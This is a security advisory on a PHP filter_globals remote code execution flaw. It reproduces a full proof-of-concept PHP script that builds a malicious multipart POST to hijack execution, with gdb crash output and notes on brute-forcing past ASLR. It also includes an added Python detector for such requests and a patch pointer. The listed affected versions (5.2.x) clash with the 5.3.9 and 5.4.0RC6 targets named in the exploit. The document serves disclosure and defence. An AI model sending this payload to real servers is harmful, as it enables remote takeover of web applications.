PHP "filter_globals" structure Arbitrary Code Execution Vulnerability


Affected Systems:
PHP 5.2.x
Unaffected systems:
PHP 5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52065

PHP is a scripting language. It is mainly used to generate dynamic web pages, but it is also used for command-line and graphical-interface programs.

PHP has a remote code execution vulnerability in the implementation of the filter_globals structure. An attacker can exploit this vulnerability to execute arbitrary code and take control of the application.

<* Source: Worawit Wang *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedure (method) may be offensive and is intended only for security research and teaching. Use at your own risk!

Worawit Wang () provides the following test method:

<?php
/* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111

   (C) Copyright 2012 Stefan Esser

   PHP 5.3.9 requires you to know the address of a writable address filled with NULL.
   32bit requires you to create a fake 32bit Hashtable instead of a 64bit one
   Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around 4000
   tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX
   Better exploit might be possible after deeper research + heap massage

   This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS

   (gdb) c
   Continuing.

   Program received signal SIGSEGV, Segmentation fault.
   0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1,
       __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350)
       at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398
   398             ht->pDestructor(p->pData);
   (gdb) i r
   rax            0x7fd9583352a0      140571464389280
   rbx            0x0                 0
   rcx            0x8                 8
   rdx            0x111111111111111   76861433640456465
   rsi            0x7fd95a077b08      140571495070472
   rdi            0x7fd9583352a0      140571464389280
   rbp            0x7fff75c47ae0      0x7fff75c47ae0
   rsp            0x7fff75c47a80      0x7fff75c47a80
   r8             0x7fff75c47bc8      140735169199048
   r9             0x1                 1
   r10            0x6238396661373430  7077469926293189680
   r11            0x7fd962f4c8e0      140571644840160
   r12            0x7fd966b91da8      140571708038568
   r13            0x0                 0
   r14            0xffffffff00000001  -4294967295
   r15            0x7fd964b10538      140571673953592
   rip            0x7fd959ca5f9d      0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>
   eflags         0x10206             [ PF IF RF ]
   cs             0x33                51
   ss             0x2b                43
   ds             0x0                 0
   es             0x0                 0
   fs             0x0                 0
   gs             0x0                 0
   (gdb) x/5i $rip
   => 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>:    callq  *%rdx
      0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>:    cmpl   $0x8,-0x3c(%rbp)
      0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>:    jne    0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625>
      0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>:    mov    -0x18(%rbp),%rax
      0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>:    mov    0x10(%rax),%rax
   (gdb)
*/

$boundary = md5(microtime());
$varname = "xxx";

$payload = "";
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n";
$payload .= chr(16);
for ($i = 1; $i < 7*8; $i++) {
    $payload .= chr(0);
}
for ($i = 1; $i < 8; $i++) {
    $payload .= "\x11";
}
$payload .= chr(1);
for ($i = 16+48+1; $i < 128; $i++) {
    $payload .= chr(0);
}
$payload .= "\n";
for ($i = 0; $i < 1000; $i++) {
    $payload .= "--$boundary\n";
    $payload .= 'Content-Disposition: form-data; name="aaa'.$i.'"'."\n";
    $payload .= "aaa\n";
}
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n";
$payload .= "aaa\n";
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n";
$payload .= "aaa\n";
$payload .= "--$boundary--\n";

echo "POST /index.php HTTP/1.0\n";
echo "Content-Type: multipart/form-data; boundary=$boundary\n";
echo "Content-Length: ", strlen($payload), "\n";
echo "\n";
echo "$payload";
?>
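As an added example that is not part of the advisory or of the PoC above (written in Python rather than PHP): a defensive check that parses a multipart/form-data body and flags the three traits of the request the PoC builds, namely more parts than PHP's max_input_vars limit, NUL bytes inside a scalar field value, and one field name sent both as a scalar and as an array. The boundary string, the sample bodies and the helper names are constructed here.

```python
import re

MAX_INPUT_VARS = 1000  # PHP's default max_input_vars since 5.3.9

def parse_multipart(body: bytes, boundary: str):
    """Return [(name, value)] for each part; a minimal form-field parser."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # "--boundary--" closes the body
            break
        headers, _, value = chunk.replace(b"\r\n", b"\n").lstrip(b"\n").partition(b"\n\n")
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            parts.append((m.group(1).decode(), value.rstrip(b"\n")))
    return parts

def audit_form(body: bytes, boundary: str, limit: int = MAX_INPUT_VARS):
    """Flag the traits of the PoC request: more parts than max_input_vars,
    NUL bytes inside a field value, and one name sent as scalar and as array."""
    parts = parse_multipart(body, boundary)
    findings = []
    if len(parts) > limit:
        findings.append("%d parts exceed max_input_vars=%d" % (len(parts), limit))
    scalars, arrays = set(), set()
    for name, value in parts:
        base = name.split("[", 1)[0]          # "xxx[0]" and "xxx[]" share base "xxx"
        (arrays if "[" in name else scalars).add(base)
        if b"\x00" in value:
            findings.append("field %r carries %d NUL bytes" % (base, value.count(b"\x00")))
    for base in sorted(scalars & arrays):
        findings.append("name %r sent both as scalar and as array" % base)
    return findings

def build_body(fields, boundary: str) -> bytes:
    """Assemble a multipart/form-data body from (name, value) pairs (test helper)."""
    b = boundary.encode()
    out = b"".join(b'--%s\nContent-Disposition: form-data; name="%s"\n\n%s\n'
                   % (b, name.encode(), value) for name, value in fields)
    return out + b"--%s--\n" % b

BOUNDARY = "0123456789abcdef"  # constructed; the PoC derives its boundary from md5(microtime())
# Constructed body shaped like the PoC: 1000 filler fields, a scalar "xxx" whose
# value carries NUL bytes, then "xxx[]" and "xxx[0]" to force the array code path.
SUSPICIOUS = build_body([("aaa%d" % i, b"aaa") for i in range(1000)]
                        + [("xxx", b"\x10" + b"\x00" * 7), ("xxx[]", b"aaa"), ("xxx[0]", b"aaa")],
                        BOUNDARY)
BENIGN = build_body([("user", b"alice"), ("tags[]", b"a"), ("tags[]", b"b")], BOUNDARY)
```

Calling audit_form(BENIGN, BOUNDARY) returns an empty list, while audit_form(SUSPICIOUS, BOUNDARY) returns all three findings; a filter in front of an unpatched 5.3.9/5.4.0RC6 host can reject a request on any one of them.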

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

http://www.php.net
